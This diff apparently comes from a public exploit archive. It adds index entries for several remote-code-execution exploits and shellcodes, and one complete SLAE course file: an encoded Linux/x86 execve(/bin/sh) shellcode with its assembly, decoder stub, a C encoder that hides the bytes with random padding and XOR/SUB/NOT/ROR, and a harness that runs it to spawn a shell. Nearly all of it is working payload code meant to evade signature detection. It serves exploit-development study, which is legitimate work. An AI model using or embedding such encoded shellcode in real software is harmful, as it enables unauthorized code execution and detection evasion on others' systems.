@ -42186,3 +42190,7 @@ id,file,description,date,author,type,platform,port
47881,exploits/php/webapps/47881.py,"Job Portal 1.0 - Remote Code Execution",2020-01-07,Tib3rius,webapps,php,
47882,exploits/hardware/webapps/47882.txt,"piSignage 2.6.4 - Directory Traversal",2020-01-07,"JunYeong Ko",webapps,hardware,
47884,exploits/php/webapps/47884.py,"Complaint Management System 4.0 - Remote Code Execution",2020-01-07,"Metin Yunus Kandemir",webapps,php,
47886,exploits/php/webapps/47886.txt,"Codoforum 4.8.3 - 'input_txt' Persistent Cross-Site Scripting",2020-01-08,"Vyshnav nk",webapps,php,
47887,exploits/php/webapps/47887.py,"Online Book Store 1.0 - Unauthenticated Remote Code Execution",2020-01-08,Tib3rius,webapps,php,
47892,exploits/java/webapps/47892.txt,"Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape",2020-01-08,hantwister,webapps,java,
47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1011,3 +1011,4 @@ id,file,description,date,author,type,platform
47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux
47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux
47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux

1 id file description date author type platform
1011 47564 shellcodes/linux/47564.py Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) 2019-10-30 Daniel Ortiz shellcode linux
1012 47784 shellcodes/linux_x86-64/47784.txt Linux/x64 - Reverse TCP Stager Shellcode (188 bytes) 2019-12-17 Lee Mazzoleni shellcode linux_x86-64
1013 47877 shellcodes/linux/47877.c Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) 2020-01-06 bolonobolo shellcode linux
1014 47890 shellcodes/linux/47890.c Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) 2020-01-08 Xenofon Vassilakopoulos shellcode linux

219
shellcodes/linux/47890.c Normal file
View file

@ -0,0 +1,219 @@
# Title: Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114)
# Author: Xenofon Vassilakopoulos
# Date: 2020-01-01
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 114 bytes
# SLAE-ID: SLAE - 1314
# Description: Linux/x86 encoding of random bytes + XOR/SUB/NOT/ROR and also decodes ROL/NOT/ADD/XOR execve(/bin/sh) shellcode
---------------------- execve-stack /bin/sh --------------------------------
global _start
section .text
_start:
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80
----------------------- Original Shellcode ---------------------------------
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes -------
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi
push esi
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov dl, len
rotate:
;; apply the decoding scheme
rol byte [esi], 4
not byte [esi]
add byte [esi], 2
xor byte [esi], 0x2c
inc esi
cmp cl, dl
je init
inc cl
jmp short rotate
init:
pop esi
lea edi, [esi +1]
xor eax, eax
mov al, 1
xor ecx, ecx
decode:
cmp cl, dl
je EncodedShellcode
mov bl, byte [esi + eax + 1]
mov byte [edi], bl
inc edi
inc cl
add al, 2
jmp short decode
call_shellcode:
call decoder
EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
len equ $-EncodedShellcode
--------- Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR ---------------
xenofon@slae:~/Documents/Assignment4$ gcc -o encoder encoder.c
xenofon@slae:~/Documents/Assignment4$ ./encoder
Shellcode:
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Shellcode Length 25
Decoded Shellcode:
0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80,
Encoded shellcode
0x4e,0x70,0x51,0x61,0x58,0xf4,0xdb,0xe1,0xef,0xef,0xef,0x6a,0x2a,0x41,0xdb,0x4c,0xdb,0x20,0xef,0xbf,0x3b,0x78,0xcb,0x77,0xfb,0x57,0xc5,0x90,0x23,0x62,0x58,0xf0,0xc5,0xe1,0x33,0xe5,0x28,0x9d,0xc5,0x3d,0x43,0xf6,0x56,0x29,0xad,0x29,0x02,0x57,0x55,0x34,
Encoded Shellcode Length 50
xenofon@slae:~/Documents/Assignment4$ cat encoder.c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#define DEC 0x2 // the value that will be used to substract every byte
#define XORVAL 0x2c // the value that will be used to xor with every byte
// execve stack shellcode /bin/sh
unsigned char shellcode[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
void main()
{
int rot = 4; //right rotation 4 bits
printf("\n\nShellcode:\n\n");
int o;
for (o=0; o<strlen(shellcode); o++) {
printf("\\x%02x", shellcode[o]);
}
printf("\n\nShellcode Length %d\n",sizeof(shellcode)-1);
printf("\n\nDecoded Shellcode:\n\n");
o=0;
for (o; o<strlen(shellcode); o++) {
printf("0x%02x,", shellcode[o]);
}
printf("\n");
int i;
unsigned char *buffer = (char*)malloc(sizeof(shellcode)*2);
srand((unsigned int)time(NULL));
unsigned char *shellcode2=(char*)malloc(sizeof(shellcode)*2);
// placeholder to copy the random bytes using rand
unsigned char shellcode3[] = "\xbb";
int l = 0;
int k = 0;
int j;
// random byte insertion into even location
for (i=0; i<(strlen(shellcode)*2); i++) {
// generate random bytes
buffer[i] = rand() & 0xff;
memcpy(&shellcode3[0],(unsigned char*)&buffer[i],sizeof(buffer[i]));
k = i % 2;
if (k == 0)
{
shellcode2[i] = shellcode[l];
l++;
}
else
{
shellcode2[i] = shellcode3[0];
}
}
// apply the encoding scheme
for (i=0; i<strlen(shellcode2); i++) {
// XOR every byte with 0x2c
shellcode2[i] = shellcode2[i] ^ XORVAL;
// subtract every byte by 2
shellcode2[i] = shellcode2[i] - DEC;
// one's complement negation
shellcode2[i] = ~shellcode2[i];
// perform the ROR method
shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));
}
// print encoded shellcode
printf("\nEncoded shellcode\n\n");
i=0;
for (i; i<strlen(shellcode2); i++) {
printf("0x%02x,", shellcode2[i]);
}
printf("\n\nEncoded Shellcode Length %d\n",strlen(shellcode2));
free(shellcode2);
free(buffer);
printf("\n\n");
}
----------------------------------- Shellcode -------------------------------------
xenofon@slae:~/Documents/Assignment4$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
xenofon@slae:~/Documents/Assignment4$ ./shellcode
Shellcode Length: 117
$ whoami
xenofon
xenofon@slae:~/Documents/Assignment4$ cat shellcode.c
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\xeb\x3c\x5e\x56\x31\xdb\x31\xc9\x31\xd2\xb2\x32\xc0\x06"
"\x04\xf6\x16\x80\x06\x02\x80\x36\x2c\x46\x38\xd1\x74\x04"
"\xfe\xc1\xeb\xec\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xc9"
"\x8a\x1c\x06\x38\xd1\x74\x12\x8a\x5c\x06\x01\x88\x1f\x47"
"\xfe\xc1\x04\x02\xeb\xec\xe8\xbf\xff\xff\xff\x4e\xd1\x51"
"\xb4\x58\x37\xdb\x55\xef\x3d\xef\xbd\x2a\x59\xdb\x81\xdb"
"\x56\xef\xae\x3b\x1a\xcb\xfa\xfb\x43\xc5\x49\x23\x12\x58"
"\xd2\xc5\xee\x33\x82\x28\x49\xc5\xc3\x43\x30\x56\xcb\xad"
"\xe1\x02\x8b\x55\x84";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}